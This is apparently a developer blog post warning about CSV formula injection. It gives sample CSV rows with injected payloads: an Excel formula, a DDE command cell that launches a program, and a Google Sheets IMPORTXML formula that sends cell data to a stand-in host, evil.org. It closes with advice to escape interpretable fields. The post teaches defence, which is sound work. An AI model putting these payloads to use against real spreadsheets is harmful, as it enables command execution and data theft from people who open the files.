As developers of business applications it is very common to create services that produce CSV files. CSV files comprise of tabular data on each row that is delimited by commas. Services for this format are simple to write and blazingly fast. Unfortunatly, partly because how quickly they can be produced, a lot of garbage can make its way into csv files. The fast majority of users will open csv files in the behometh, and much loved, Microsoft Excel. Excel is complete beast and will happily do many things with our csv file.
Injecting CSV files with malicious stuff
Inserting formulas
A typical csv file would look like the one below
productid,catid,name,stock,cost,rsp
1201,1,Spycam full hd,2,20.00,34.99
1234,1,Dome camera 12mp,4,40.00,65.99
A malicious csv file might look like
productid,catid,name,stock,cost,rsp
1201,1,Spycam full hd,2,20.00,34.99
1234,1,Dome camera 12mp,="100000/2"",40.00,65.99
Here the opened excel file will show the result of 5000 in the cell D4. Now as you might expect the running of formula present in a CSV is very worrying. After all Excel is turing complete. So, W00t, what nasties can we do?
Inserting commands
Well similariy we can execute arbitrary commands using excel’s command interface. Try the csv file below.
productid,catid,name,stock,cost,rsp
1201,1,Spycam full hd,2,20.00,34.99
1234,1,Dome camera 12mp,="100000+cmd|' /C clac'!A0",40.00,65.99
If you open that csv file in excel it will cause, on windows system, the system calculator to open up.
Inserting content
So, what else can we do? Well let’s assume we are using google sheets this time around.
productid,catid,name,stock,cost,rsp
1201,1,Spycam full hd,2,20.00,34.99
1234,1,Dome camera 12mp,"=IMPORTXML(CONCAT(""http://evil.org/?v="", CONCATENATE(A1:C1)), ""//a"")",40.00,65.99
What just happened? Well we just sent all the product ids to evil.org. Well that’s horrible! Also, we did using our own security credentials — extra points if you are an admin on the system. It might be unfortunate, for example, if the request pointed to your online bitcoin wallet and transferred some bitcoin to some unscrupulous individual.
Conclusion
Be wary of how you handle csv files and how you escape fields which may be interpreted. Ideally, all csv interpretation should be disabled and developers should escape fields that could be interpreted as formulas.
Good luck!